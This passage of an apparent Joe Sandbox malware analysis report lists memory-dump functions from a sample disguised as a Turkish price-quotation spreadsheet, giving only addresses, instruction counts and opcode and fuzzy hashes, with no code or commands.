                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b01c02042d4ca5cca980f6d6ab8e213b10eec73c671e82f4f2ae714e24f5c2b
                                                  • Instruction ID: 2ef3c6f37d903517dad0ffd04ab858e6c2990383529c9328feec540c54e16678
                                                  • Opcode Fuzzy Hash: 6b01c02042d4ca5cca980f6d6ab8e213b10eec73c671e82f4f2ae714e24f5c2b
                                                  • Instruction Fuzzy Hash: AC316B35D0E7848FDB0ACB6998952947BB0AF5E22070A40E7C085CF2B3D778A896CB51
                                                  Function 057EC1C0 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1db68f3da285d3daccad1adfc13e0d970fed833b53d37f4249b4f81256707203
                                                  • Instruction ID: 49edf940e94d8bd63be17e953f83f820e8ed1aa21e1c5d64490bb66ee35a2780
                                                  • Opcode Fuzzy Hash: 1db68f3da285d3daccad1adfc13e0d970fed833b53d37f4249b4f81256707203
                                                  • Instruction Fuzzy Hash: E241F7B4D06319CFEB25CFAAC884B9DBBFABB48304F5481A9D009A7295D7745D80DF40
                                                  Function 05AD7650 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 435c127f8a2e00995d905c8f4c4eeeef910bf533a90189656d5485a8d323437c
                                                  • Instruction ID: d850f349802e404ef33b1d9917d44bdcc6f43c020772f45b6ce73ee47cdc0e66
                                                  • Opcode Fuzzy Hash: 435c127f8a2e00995d905c8f4c4eeeef910bf533a90189656d5485a8d323437c
                                                  • Instruction Fuzzy Hash: 5C31C2B0906218CFDB68DF9AD948FADFBF2FB49304F509469D01AA7254DB755882CF20
                                                  Function 05AECD48 Relevance: .1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88e9f71cd94cb9a30bedc01af475996dbde9a6aa488dc25080dd254e85849662
                                                  • Instruction ID: 05d056e16a720a9f826972051ad63ad12f4e54c358499495f576eee1ef9106cc
                                                  • Opcode Fuzzy Hash: 88e9f71cd94cb9a30bedc01af475996dbde9a6aa488dc25080dd254e85849662
                                                  • Instruction Fuzzy Hash: E13147B4E05209CFDB44CFA9D895AEEBFF6FB89310F00802AE409A3251D7355941CBA4
                                                  Function 05AD6268 Relevance: .1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6fc879ef65aef976a4f8ff732fafd991c139656b0b5c2ce0e2e8d2a516c1256
                                                  • Instruction ID: f5e90b8810d8b2257d75057b97fa269b6f2fe1e8a94cbdfb382a4e4764b6bb44
                                                  • Opcode Fuzzy Hash: b6fc879ef65aef976a4f8ff732fafd991c139656b0b5c2ce0e2e8d2a516c1256
                                                  • Instruction Fuzzy Hash: A5313774E002099FCF05DFA9D8459EEBFB6FF88310F10846AE806A3361DB305905CB61
                                                  Function 03117BEA Relevance: .1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e7dce9adb5b7423369f3aaa054fbe4cbf5dd17dca3d6ce4b5a81e8e6d71c2a1
                                                  • Instruction ID: 31ee69fc11426ecfce75197dc225ecfca106356cd7beb17302f33639c294883a
                                                  • Opcode Fuzzy Hash: 0e7dce9adb5b7423369f3aaa054fbe4cbf5dd17dca3d6ce4b5a81e8e6d71c2a1
                                                  • Instruction Fuzzy Hash: 71313470A42109CFD704CF19E988BEAB7B2FB4C305F2954B5E506AB3A1CB795D94CB44
                                                  Function 05AECD58 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39c7c946a00f0df0ce238eb6ce58ff42e6edc2243cf7a7289ba2836f993ef255
                                                  • Instruction ID: 822f05a1b97d9c7e23e220b423cfc686d7e51e859d9e4b9080c102ff7279ab81
                                                  • Opcode Fuzzy Hash: 39c7c946a00f0df0ce238eb6ce58ff42e6edc2243cf7a7289ba2836f993ef255
                                                  • Instruction Fuzzy Hash: 0B312674E05209CFDB44CFAAD895AEEBBF6FB89310F10802AE419B7240E77559418FA0
                                                  Function 05ADA508 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1b2c3825490a898e9e365787da3148d9f0f3a150cd82085d40f7b86abd0ebcd
                                                  • Instruction ID: 598593faa0430f7ac70f304c295bb3cac9f65735a7f13043cc96bf5cb1e39fd2
                                                  • Opcode Fuzzy Hash: c1b2c3825490a898e9e365787da3148d9f0f3a150cd82085d40f7b86abd0ebcd
                                                  • Instruction Fuzzy Hash: A1318F75A00218DFCF149F68C494DEDBBB6FF89320F148169E516A7390CB319846DBA0
                                                  Function 031118B0 Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 318428aea1529471febe5a00c566389e0667b78909ab4f123073da9da641410e
                                                  • Instruction ID: 1040ed57e73de286f7f4b3961028c942d072345c2d48d9e177a8ee4ef5ad9d0d
                                                  • Opcode Fuzzy Hash: 318428aea1529471febe5a00c566389e0667b78909ab4f123073da9da641410e
                                                  • Instruction Fuzzy Hash: 05210371B052019FC709DB38E814BAE7BE7AFC9310F1580B6D606CB2A5DB788C468B51
                                                  Function 05AE50C0 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ccbdc47184e661a0801f8742a21e4548f464fc2365673af509562b85210d43e7
                                                  • Instruction ID: 96ed3d18c62cff949258dd45e6709e2e4bf94dafab9ba798fc261492f2e553ea
                                                  • Opcode Fuzzy Hash: ccbdc47184e661a0801f8742a21e4548f464fc2365673af509562b85210d43e7
                                                  • Instruction Fuzzy Hash: 2C217674F10A098FCB04EF78D5588AEB7B5FF8D700B10416AD506A7364EF30AA46CBA1
                                                  Function 05ADBD37 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a179d72b3e950958caa1a864b8933f04ae8fef22ca46ad6b26c5cb025f691ea
                                                  • Instruction ID: 6d07f5015e583d7084679d6b77dce00ed3b7d5e61598fb210a101d84cf3b0ff5
                                                  • Opcode Fuzzy Hash: 5a179d72b3e950958caa1a864b8933f04ae8fef22ca46ad6b26c5cb025f691ea
                                                  • Instruction Fuzzy Hash: 10216070A002198FCB14EF69C840EBEFBB2FF89644F014469D95697351EB349806CFB1
                                                  Function 05AD7BA4 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55a92b8258e197881a756f831630e215c71b3e721ac79d7e9a5c7655551f48f5
                                                  • Instruction ID: 89d4e5ec7d3a4d3feb7b3de710be06f431898f236e1f38b9970cd329b6cdd171
                                                  • Opcode Fuzzy Hash: 55a92b8258e197881a756f831630e215c71b3e721ac79d7e9a5c7655551f48f5
                                                  • Instruction Fuzzy Hash: 05311974A02218CFDB54EF69E488B9DBBB2FB59304F1041AAE00AA7355DB345E85CF61
                                                  Function 03113AD0 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 013534687d38c35e405bf503f3c9565c4a9870a9a3aa11eb21f722d2a8e15e99
                                                  • Instruction ID: 175f253c34fbd2ae048ccaedc169cfeec343a05807c8c86ae6d16d65fce5263f
                                                  • Opcode Fuzzy Hash: 013534687d38c35e405bf503f3c9565c4a9870a9a3aa11eb21f722d2a8e15e99
                                                  • Instruction Fuzzy Hash: 69314D74A05104CFDB28CF19E988BEAB7B2FB48301F5988B5D016D71A8E77459E5CF04
                                                  Function 0311C748 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dae9468381f0d64312b33bafaafc58411761b45c84014481a5a8e69e55193dd2
                                                  • Instruction ID: 918294bbfc56b85489a82e4651b4ffce8b58cb6696a43942571ca68d349a77ac
                                                  • Opcode Fuzzy Hash: dae9468381f0d64312b33bafaafc58411761b45c84014481a5a8e69e55193dd2
                                                  • Instruction Fuzzy Hash: BF2137B4E402098FDB08DFAAC8442EEBBF6BB8D300F14853AC505B3254EBB449518BA0
                                                  Function 05AE1900 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 065db4699a583e4bcf7cd3d202b80f73b6d196c7785451579275c3a39c18d747
                                                  • Instruction ID: 166fe6516555f993bbd347c692bb42343b7c9ed827103be71b25988c0d48c164
                                                  • Opcode Fuzzy Hash: 065db4699a583e4bcf7cd3d202b80f73b6d196c7785451579275c3a39c18d747
                                                  • Instruction Fuzzy Hash: 35216A72601104AFCB05CFA5D988D99BBB2FF49320B0640A9E6099B372C731EC15DB50
                                                  Function 05ADE1D0 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d086b5da903efa29a359e0a3f55222a024845ee58e64eb281838b1469f38d0db
                                                  • Instruction ID: 9b13bd3d1b4a08e12a849bb21ed5a03895ac88a45fbc451ced84ee2190501663
                                                  • Opcode Fuzzy Hash: d086b5da903efa29a359e0a3f55222a024845ee58e64eb281838b1469f38d0db
                                                  • Instruction Fuzzy Hash: 5B215E71E00209DFDF50EFB4C804BAEBBF9AB04340F108066D52ADB290E634DA45CBA1
                                                  Function 0148D508 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2041475426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_148d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf86daf2202b61be26b7bbecc436998cf5f49f8c523238bf0fc35a7a0eaa051d
                                                  • Instruction ID: ecf1fedd6596b186b410c667f466bdcea11c40f13f98d834660c9e3cf898be7a
                                                  • Opcode Fuzzy Hash: bf86daf2202b61be26b7bbecc436998cf5f49f8c523238bf0fc35a7a0eaa051d
                                                  • Instruction Fuzzy Hash: 38210671905204DFDB06EF58D9C0F1BBF65FB98318F24856BD9090A3A6C336D456C6B1
                                                  Function 0148D5F4 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2041475426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_148d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03ce49b55960346f9b1f34617c15b92e75627952c3dfab526268f285c0ec5d3c
                                                  • Instruction ID: cfc232e206e5f8312f4daf06caadc68002b60953ac360df0f815095a196b5a38
                                                  • Opcode Fuzzy Hash: 03ce49b55960346f9b1f34617c15b92e75627952c3dfab526268f285c0ec5d3c
                                                  • Instruction Fuzzy Hash: 62210671904248DFDB05EF94D9C0F1BBF65FB88318F20856AD90D1A3A6C33AD456C6A1
                                                  Function 0149D01C Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2041534304.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_149d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8585f59555de34ee41db45b8c186b85498d30385981a72cadad048b2c65a3df
                                                  • Instruction ID: 1d1bb382a5de31bc91ef67d0c0a350de9523b7f1a41cbce5d962c89705a69863
                                                  • Opcode Fuzzy Hash: f8585f59555de34ee41db45b8c186b85498d30385981a72cadad048b2c65a3df
                                                  • Instruction Fuzzy Hash: 4921D3B1904244DFDF15DF58D984B27BFA5FB84358F24C56AE9090B366C33AD407C6A2
                                                  Function 057E4051 Relevance: .1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a039165b2e04aa6f1f882288dad66625aa961e50a15bf507ae72495856174583
                                                  • Instruction ID: c5bc61f056241ae1f269fc0b452a6b7f681f2af8f365f9c90d74b0b1ec48b111
                                                  • Opcode Fuzzy Hash: a039165b2e04aa6f1f882288dad66625aa961e50a15bf507ae72495856174583
                                                  • Instruction Fuzzy Hash: B5216470D152198FCF05CFA9D8886EEBBB2FF8D301F1488AAD005A6250DB745A84DBA1
                                                  Function 05E04C2C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20bfea0e1c746612989ee103a1f1286ab4c8b3ed80c4e78e9c6d7c82a333a070
                                                  • Instruction ID: ce9047b55cac7be13db21300a036c04fa06f38620b22eead8b1ccd77febb5e1f
                                                  • Opcode Fuzzy Hash: 20bfea0e1c746612989ee103a1f1286ab4c8b3ed80c4e78e9c6d7c82a333a070
                                                  • Instruction Fuzzy Hash: D531C2B4D05219CFEF60CF55DA54BACBBB1FB08305F40A1AAE589A7290EB7059C5CF00
                                                  Function 057EDB79 Relevance: .1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ba9555c7ced7a56c88a9a7edeb6ad0175afac0efb24961f83adbc4674216677
                                                  • Instruction ID: 57ebc27072e2a539b82e85b827a142b86c16061384fd0c06f2ca672f73225425
                                                  • Opcode Fuzzy Hash: 5ba9555c7ced7a56c88a9a7edeb6ad0175afac0efb24961f83adbc4674216677
                                                  • Instruction Fuzzy Hash: 26212875A402088FCB28DF94C655EEDB7F6BB4C300F604599E401BB2A5DB759D41DBA0
                                                  Function 03118020 Relevance: .1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8fdc669666191f83ca58abaaed24f004fdb941ba772c2fe22860dcdb218bcf0
                                                  • Instruction ID: d318f79d832f3a3eefd809d267c308ed07b3137fddb78a19d9d3b93e5b2f2923
                                                  • Opcode Fuzzy Hash: e8fdc669666191f83ca58abaaed24f004fdb941ba772c2fe22860dcdb218bcf0
                                                  • Instruction Fuzzy Hash: 2821447090520CDFDB44EFAAD4887ADBBF1FB4E304F24C1AAD009A7265E7344A94CB11
                                                  Function 05AE50B0 Relevance: .1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46fbcc38f9e87981818c50a3bafde7a1a0070b9d50aa6fa29793e87f6b03516e
                                                  • Instruction ID: 3675003c7eba8b4123dd3ece69968604333a05b7feb5bfe73129ac01e0d66c4c
                                                  • Opcode Fuzzy Hash: 46fbcc38f9e87981818c50a3bafde7a1a0070b9d50aa6fa29793e87f6b03516e
                                                  • Instruction Fuzzy Hash: 40218375B106098FCB00EF78D4549AEB7B5FF8D300B10416AD505E7360EB31AA06CBA1
                                                  Function 057EDB88 Relevance: .1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c770260ca138b30e815d48ed2783179f2944c47f44fd6953022dfaffb6c70d95
                                                  • Instruction ID: 9af4e347c9218f6eb7f6a6931ddd12c078d6ccea82760c7c23eae0b0ff02d793
                                                  • Opcode Fuzzy Hash: c770260ca138b30e815d48ed2783179f2944c47f44fd6953022dfaffb6c70d95
                                                  • Instruction Fuzzy Hash: 9321F571A402098FDB14DF98C645AEDB7F2FF4C300F5045A9E405BB2A1CB76AD45CBA0
                                                  Function 05AD7148 Relevance: .1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d7ea15c42513be2d79c0e4bf701bcf3817bee339065738bd428197d350f587a
                                                  • Instruction ID: a0355c83b8dbc6e11ed9eb13b5e73f00f0c4b1d11e66cab8e6f8f15cfc443d9f
                                                  • Opcode Fuzzy Hash: 8d7ea15c42513be2d79c0e4bf701bcf3817bee339065738bd428197d350f587a
                                                  • Instruction Fuzzy Hash: 2B2181749051089FEB18DF69D845BEABBF2FB95300F4081AAE10AA7365DB345986CF60
                                                  Function 057ED118 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ab6272d9e3438804a383f6e8a428969533ecd89ec4f5d04d4dd23a2b54e515c
                                                  • Instruction ID: 3bf6ca643ff96eb47181e38320ddecbdf6cbc0e122d37dbb92153882bd78b85e
                                                  • Opcode Fuzzy Hash: 8ab6272d9e3438804a383f6e8a428969533ecd89ec4f5d04d4dd23a2b54e515c
                                                  • Instruction Fuzzy Hash: A22125B4E1530ADFCB24CFA9C8856AEBBB2FB48301F1585A9C805A7354D7749982CF91
                                                  Function 057E4060 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d4bef81b4d65ba34ad3bd894c0e4deb501af1e0f7eadc19af70b82c0988910c
                                                  • Instruction ID: 98401389be27aec916a63fbc894dade60b32cccae9eb9112607028878462f380
                                                  • Opcode Fuzzy Hash: 8d4bef81b4d65ba34ad3bd894c0e4deb501af1e0f7eadc19af70b82c0988910c
                                                  • Instruction Fuzzy Hash: 43214370E152098FDF05DFAAD8482EEBBB6FF8C311F10886AD405B6240DB741A84DBA1
                                                  Function 05AD9E94 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18508f9bb9a2021b4f9676eb15148c338904d74dd68c1be5adbbd97864e01bd2
                                                  • Instruction ID: b338c3db789f911d7225fa29573810cc094f00a374cc18f9c9709a5616bf5186
                                                  • Opcode Fuzzy Hash: 18508f9bb9a2021b4f9676eb15148c338904d74dd68c1be5adbbd97864e01bd2
                                                  • Instruction Fuzzy Hash: 392192706102055FCB54EB69E445B6EBBFAFF88700F008939E00AD7655DFB59D0A9BA0
                                                  Function 03117400 Relevance: .1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd291ac36e330b97c19f2e37aad445b912cadb2ff19d84485ce20b102cae158c
                                                  • Instruction ID: 7ae7833543f82d21527e2fbfadb08d06d7203a6eafb6b9a5fdf43503adf2cd90
                                                  • Opcode Fuzzy Hash: dd291ac36e330b97c19f2e37aad445b912cadb2ff19d84485ce20b102cae158c
                                                  • Instruction Fuzzy Hash: 10216F3154D7808FD316CB2498663917FB2AB5A320F1E41FBC4CA8B6E7C7385855D752
